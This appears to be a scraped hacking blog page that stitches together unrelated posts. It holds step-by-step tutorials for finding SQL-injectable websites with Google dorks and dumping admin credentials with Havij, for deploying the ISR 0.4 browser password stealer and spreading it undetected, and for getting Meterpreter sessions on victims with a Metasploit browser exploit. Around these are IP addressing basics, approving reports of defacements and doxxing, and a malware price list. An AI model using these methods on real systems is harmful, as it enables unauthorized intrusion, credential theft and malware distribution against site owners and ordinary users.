Hi Friends in this Tutorial i will Tell you How to Hack Web Sites With Sql Injection tool, there are large amount of sql vulnerable sites available.

Google Dorks: Google dorks are specifically query's that can reveal all the information about the specific website. I am giving you some Google dorks which you can use for finding the website vulnerable to sql injection.

    addToCart.php?idProduct=

    addtomylist.php?ProdId=

    add-to-cart.php?ID=

    adminEditProductFields.php?intProdID=

    advSearch_h.php?idCategory=

    affiliate.php?ID=

    affiliate-agreement.cfm?storeid=

    affiliates.php?id=

    ancillary.php?ID=

    archive.php?id=

    article.php?id=

    phpx?PageID

    basket.php?id=

    Book.php?bookID=

    book_list.php?bookid=

    book_view.php?bookid=

    BookDetails.php?ID=

Finding target:

1) Now just paste any one of the query in Google search box you will get a lot of websites.

2) Now open any of the website so you will get the link like this.
    www.example/index.php?id=12 or any number

3) We have to just add a single quote (') at the end of link so it will become some thing like this.
    www.example.com/index.php?id=12'

4) Look closely at the page before adding single quote (') and after adding single quote (') . If the some element of the page is missing then Bingo!!! you have found a vulnerable website. Now we can start our sql injection. And if the page remains the same or show's error like page not found then it is not vulnerable and you should move to another website. 

Now we have our target ready so what are you waiting for just attack.

1) First of all download Havij 1.15 

                                           Download Havij

2) Now extract it and run it. It will look some thing like this.

3) Now paste your target in the highlighted box. And click analyze.

4) Let it analyze your target for some time. and then you will see something like this.

5) Now click on "Tables" tab. You will see something like this.

6) Now click on "Get DBs" ( Make sure you have tick-marked on the first option, let it be anything ). Now wait for about a minute you will some thing like this.

7) Now tick-mark both the option's. And click on "Get Tables". And wait for some 2-3 minutes. You will get a lot of information from this. It'll look something like this.

8) Now search something sensitive like admin, users, login, passwords, and many more. Tick-mark them and click on "Get Columns". You will see something like this.

9) Now there you have user_id, password, user_name. Now tick-mark them and select "Get Data". You will see something like this.

10) Now find admin panel. And login using the user_id and password found.

Short for Internet Protocol, IP is an address of a computer or other network device on a network using IP or TCP/IP. For example, the number "166.70.10.23" is an example of such an address. These addresses are similar to an addresses used on a house and is what allows data to reach the appropriate destination on a network and the Internet.

There are five classes of available IP ranges: Class A, Class B, Class C, Class D and Class E, while only A, B, and C are commonly used. Each class allows for a range of valid IP addresses. Below is a listing of these addresses.

Class	Address Range	Supports
Class A	1.0.0.1 to 126.255.255.254	Supports 16 million hosts on each of 127 networks.
Class B	128.1.0.1 to 191.255.255.254	Supports 65,000 hosts on each of 16,000 networks.
Class C	192.0.1.1 to 223.255.254.254	Supports 254 hosts on each of 2 million networks.
Class D	224.0.0.0 to 239.255.255.255	Reserved for multicast groups.
Class E	240.0.0.0 to 254.255.255.254	Reserved for future use, or Research and Development Purposes.

Ranges 127.x.x.x are reserved for the loopback or localhost, for example, 127.0.0.1 is the common loopback address. Range 255.255.255.255 broadcasts to all hosts on the local network.

IP address breakdown

Every IP address is broke down into four sets of octets that break down into binary to represent the actual IP address. The below table is an example of the IP 255.255.255.255. If you are new to binary, we highly recommend reading our binary and hexadecimal conversions section to get a better understanding of what we're doing in the below charts.

IP:	255	255	255	255
Binary value:	11111111	11111111	11111111	11111111
Octet value:	8	8	8	8

If we were to break down the IP "166.70.10.23", you would get the below value. In the below table, the first row is the IP address, the second row is the binary values, and the third row shows how the binary value equals the section of the IP address.

166	70	10	23
10100110	01000110	00001010	00010111
128+32+4+2=166	64+4+2=70	8+2=10	16+4+2+1=23

Automatically assigned addresses

There are several IP addresses that are automatically assigned when you setup a home network. These default addresses are what allow your computer and other network devices to communicate and broadcast information over your network. Below is the most commonly assigned network addresses in a home network.

192.168.1.0	0 is the automatically assigned network address.
192.168.1.1	1 is the commonly used address used as the gateway.
192.168.1.2	2 is also a commonly used address used for a gateway.
192.168.1.3 - 254	Addresses beyond 3 are assigned to computers and devices on the network.
192.168.1.255	255 is automatically assigned on most networks as the broadcast address.

If you have ever connected to your home network, you should be familiar with the gateway address or 192.168.1.1, which is the address you use to connect to your home network router and change its settings.

Getting an IP address

By default the router you use will assign each of your computers their own IP address, often using NAT to forward the data coming from those computers to outside networks such as the Internet. If you need to register an IP address that can be seen on the Internet, you must register through InterNIC or use a web host that can assign you addresses.

Anyone who connects to the Internet is assigned an IP address by their Internet Service Provider (ISP) who has registered a range of IP addresses. For example, lets assume your ISP is given 100 addresses, 109.145.93.150-250. This means the ISP owns addresses 109.145.93.150 to 109.145.93.250 and is able to assign any address in that range to its customers. So, all these addresses belong to your ISP address until they are assigned to a customers computer. In the case of a dial-up connection, you are given a new IP address each time you dial into your ISP. With most broadband Internet service providers because you are always connected to the Internet your address rarely changes and will remain the same until the service provider requires it to be changed.

CTF365 is for those who love challenges, who love competition and hacking.
So if you are into security, ctf365.com is the right place for you.

CTF365 is World of Warcraft for Hackers
You will have to fight with your own real tools… hacking tools.
Backtrack,Metasploit, Nmap, BackBox Linux or whatever you choose to use as weapons.
You will be able to build your own computer network, you will have routers, switches.
You will build your own team and they will provide you Red Team Tool Kit for team communication and many more features.

Anonymous has posted personal data of many members of the Westboro Baptist Church and 
is promising to shut down the religious sect after it announced plans to protest the funerals 
of those killed at Sandy Hook Elementary School last week.
The upload to Pastebin shows names, addresses, birth dates, emails, and phone numbers 
for many of the WBC members, along with domain details for the many sites it owns,
including godhatesfags.com, beastobama.com, and godhatesthemedia.com.

Hack was performed by Anonymous India hacking group and claiming to hack whole server, with 250 Databases. Hacker wrote on deface page, that they deleted all the databases and dump credentials of BSNL database servers in a pastebin File.

This time Yahoo Messenger is turning to get a feature trim, and the company has announced on their blog that the once popular messaging service will lose some important features starting December 14th.

First of all Yahoo Messenger will lose interoperability with Microsoft’s Live Messenger. Users will still see their Live friends online but they will not be able to send them messages or interact in any way.

Chat Rooms as well as Voice calls to landlines are also getting cut.
And lastly and probably least important: Pingbox, an embeddable applet developed by Yahoo, will stop functioning after the 14th.
 Anonymous Supporters defaced 500 websites
Hacker’s Supporting Anonymous Group, with nickname - "PV~E.rr0r" hacked 516 websites.  Deface page shows Anonymous logo with text "We unite as one but no one can divide us. Expect us!"

Hacker’s intention was not to harm the website, so he has not change or delete any file, he just upload his deface page on each site at "/Err0r.html".

At the end of July, Microsoft launched the public beta of Outlook.com, its new online email service. Today, Microsoft announced that since the beta launch, there are now over 25 million active users on Outlook.com.

"H4ksniper" hacker hacked three South African government websites. The website opened to a black page with a window containing the animated graphic “Website hacked by H4ksniper”.

Another message on the deface page was "Hello South Africa :D , Bad News For You IM BACK ! ..You Messed With Us & Now You Must Suffer..From Morocco with love."

A Cloud-based Security service which can significantly enhance the security of your website, while also boosting its performance.
a Distributed Denial of Service (DDoS) attack is a DoS attack that is usually carried out by a “botnet”, a network of computers acting in concert to overwhelm the server by depleting all available resources.
Incapsula DDoS Protection service use both defense techniques, by integrating a Global network of multi-gigabit scrubbing centers with a unique bot (automation) detection technology.
As a result, Incapsula provides complete protection from network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.

Hacker’s group “Anonymous”  has declared cyberwar on Israel, posting personal data of five thousand Israeli officials online.
The Israeli government has ignored repeated warnings about the abuse of human rights, shutting down the internet in Israel and mistreating its own citizens and those of its neighboring countries,” the hackers wrote in a statement.

The document contains names, email addresses and ID numbers apparently belonging to Israeli officials.

President of Sri Lanka official website(president.gov.lk)  has been hacked by hacker named "Broken-Security", using Blind Sql Injection vulnerability and is also posted on a pastebin note with database dump including table and column names. Dump include the Username and Encrypted password of admin.

What is Stealer?
Stealer is basically used for steal the saved cookies in browsers. It only steal The saved Passwords in browsers eg.IE, chrome, firefox, And any massangers.
Tools to use
• IS 6.0 ,6.3
• ISR 0.4
These are mainly used tools to steal the passwords.
We seen many stealers like istealer6.0 or something like that but now in this these tools are not in use bcoz we seen in logs username password is same. So we can use this upgraded version that is CALLED ISR 0.4 that is ultimate stealer to use..so use this tool to hack the password.

Here Is the tutorial to use it.

What you Need to use it.
1. Domain
2. Hosting
3. My SQL Database
4. Tools eg.ISR 0.4

1.Domain
Purchase a domain or free Doamin’s are also available.
Eg.www.example.com

2.HOSTING
Then you Want Hosting. Hosting is a web space that is used for host your website there with your domain name.

3.My SQL database
That is used to store web site information like blog posts or user information. A MySQL database is the most popular type of relational database on the web today.

4.Tools
That tools is our main part to steal the cookies from victims.
SO let’s start..
First purchase a domain and hosting accoung. OR it’s available in free also.
I am doing this with free domain and free hosting.
Here you go.

STEPS:

1. Go to http://000webhost.com
2. Sign up there with free order.
3. After creating your hosting and domain Go to your cpanel.
After that Create My SQL Database .
1. GO to SQL Database 

2. Create a database and one database user account.

3. After creating Database save this information.

• $dbHost = "fdb-1-5.cwahi.net"; // (1)MySQL host

• $dbUser = "username"; // (3)MySQL username

• $dbPass = "password"; // (4)MySQL password

• $dbDatabase = "username_db1"; // (2)MySQL database name

Then back to cpanel after that

1. Go to file manger.

2. Here you want go in public_html

3. Here you want to upload some files of our tools that is in PHP 

language.

WE are using ISR 0.4

So it’s files are.

• Config.php

• Install.php

• Index.php

• Style.css

So upload these files in your directory.

After that go to your directory .

1. Click on config.php

2. Click on edit.

Then go your Domain name eg.www.example.com

1. Then type in url: http://www.example.com/install.php

2. Then click on INSTALL

3. After install delete install.php from your hosting.

Here is everything is done with hosting and domain.

1. Go to your tool That is ISR0.4.exe

2. Open it in url field paste your domain name link here.

Eg. http://www.example.com/index.php

3. Then click on Bulid Server 

4. After bulid server bind your file with Anything and make a fud.

5. Spread it….And enjoy it…

6. TO show your logs go to your domain eg. http://www.example.com/index.php

7. Login there with your usename password.

If You Wnat to download these all files which You use in create stealer.

                                                                   Download

So First You Need .

1. Backtrack R3 Operating System
2. Metasploit
3. Exploit

So lets' Start.....

1.Start Backtrack in Gui MOde.

2.Open Terminal

3.Type :msfconcole

4.Then Type

msf: use exploit/multi/browser/java_signed_applet

5.To Show soptions Type 

msf:show options

6.After This You want set LHOST Means Localhost .

First check you Ip from network connections if you are doing this live check your isp ip address.

TO set LHOST Type:

msf: set LHOST eg.192.168.1.27

7.Then you want to set LPORT.

TYPE:

msf: set LPORT 80

9.Then Set URIPATH

TYPE :

msf: set URIPATH /

Now Everything is Set.

Now Type:

msf : exploit 

After This GO to victim Machine Or give him your ip address 

like this: 192.168.1.27:8080

When He/she open your link he/she see this massage on screen

Cick On RUN and you can see in bt Session is opend

To See sessions 

type:

msf :session -i

To Open Meterpreter

type

msf: session -i 1 (1 is session id)

Enjoy ........

Stay tuned for new exploits or tutorials.

OLPC Project started a little experiment about 5 months ago. They chose a village in Ethiopia where the literacy rate was nearly 0% and decided to drop off a bunch of Motorola Xooms there.

The One Laptop Per Child project started as a way of delivering technology and resources to schools in countries with little or no education infrastructure, using inexpensive computers to improve traditional curricula.

After 1st Four Minutes, One kid had opened the box and had figured out how to turn on the Xoom. Next, in 1st Five Days, The kids were using nearly 50 applications each every day. In Two Weeks - The kids were singing their ABC’s in English. Now its 5th Month - They hacked the Motorola Xooms so they could enable the camera, which had been disabled by OLPC.

Anonymous hack 30000 accounts from 'Telecom Italy'
Anonymous hacked into "Telecom Italy" and dump Social Security Number, Social Insurance Number, 30000 credentials and lots of vulnerabilities exposed.
Telecom Italy boasts 3000 XSS error and vulnerabilities that allow third parties to access the "htaccess" and other sensitive data.

Russian Underground Cybercrime market
Security firm Trend Micro recent analyses the Russian crimeware markets and has found that malware tools and services are being provided by them.

Current prices on the Russian underground market:
• Hacking corporate mailbox: $500
• Winlocker ransomware: $10-20
• Unintelligent exploit bundle: $25
• Intelligent exploit bundle: $10-$3,000
• Basic crypter (for inserting rogue code into a benign file): $10-$30
• SOCKS bot (to get around firewalls): $100
• Hiring a DDoS attack: $30-$70/day, $1,200/month
• Botnet: $200 for 2,000 bots
• DDoS botnet: $700
• ZeuS source code: $200-$500
• Windows rootkit (for installing malicious drivers): $292
• Hacking Facebook or Twitter account: $130
• Hacking Gmail account: $162
• Email spam: $10 per one million emails
• Email spam (using a customer database): $50-$500 per one million emails
• SMS spam: $3-$150 per 100-100,000 messages

Anonymous leaks VMware ESX Server Kernel source code
"Stun", the member of group “Anonymous” leaks the VMware ESX Server Kernel source code via twitter today. The tweet reads,  "WILD LEAKY LEAK. FULL VMware ESX Server Kernel LEAKED. VMware ESX is an enterprise-level computer virtualization product offered by VMware.

A 1.89 MB uploaded on torrent and titled "VMware ESX Server Kernel LEAKED".